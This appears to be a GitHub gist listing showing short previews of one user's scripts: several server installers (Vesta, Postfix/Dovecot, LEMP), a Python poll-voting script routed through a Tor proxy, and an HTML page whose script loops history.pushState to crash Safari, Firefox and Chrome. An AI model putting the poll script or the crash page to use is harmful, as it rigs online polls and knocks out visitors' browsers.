This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import time, os, requests | |
num = input( "\x1b[1;31;50m How many poll:\x1b[0m" ) | |
if(int(num)): | |
def pollcode(): | |
Proxy = { | |
'http' : "socks5://127.0.0.1:9050", | |
'https' :"socks5://127.0.0.1:9050" | |
} | |
Post = {'answer': '3'} # change answer |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Vesta Ubuntu installer v.05 | |
#----------------------------------------------------------# | |
# Variables&Functions # | |
#----------------------------------------------------------# | |
export PATH=$PATH:/sbin | |
export DEBIAN_FRONTEND=noninteractive | |
RHOST='apt.vestacp.com' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
################################################################################# | |
# Ubuntu 14.04 LTS Server # | |
# Automated Bash script install and configure / Postfix / Dovecot / with mysql # | |
# By https://github.com/Saleh7 # | |
# https://github.com/Saleh7/Scripts/blob/master/postfix-dovecot.sh # | |
################################################################################# | |
# Edit here .. | |
mysqlPass='PasswordRoot' # mysql root password here |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
# Auto Install and Setup LEMP # | |
#Example:sudo bash lemp16.4.sh -p MyPassword | |
# By Saleh7 - https://github.com/Saleh7 | |
E=`tput setaf 1` | |
G=`tput setaf 2` | |
A=`tput setaf 3` | |
C=`tput setaf 6` | |
B=`tput bold` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<!-- https://github.com/Saleh7 --> | |
<body> | |
<h1>Crash Safari - Firefox - Chrome</h1> | |
<script> | |
var total = ""; | |
for( var i = 0; i < 100000; i++ ) { | |
total = total + i.toString(); | |
history.pushState(0,0, total ); |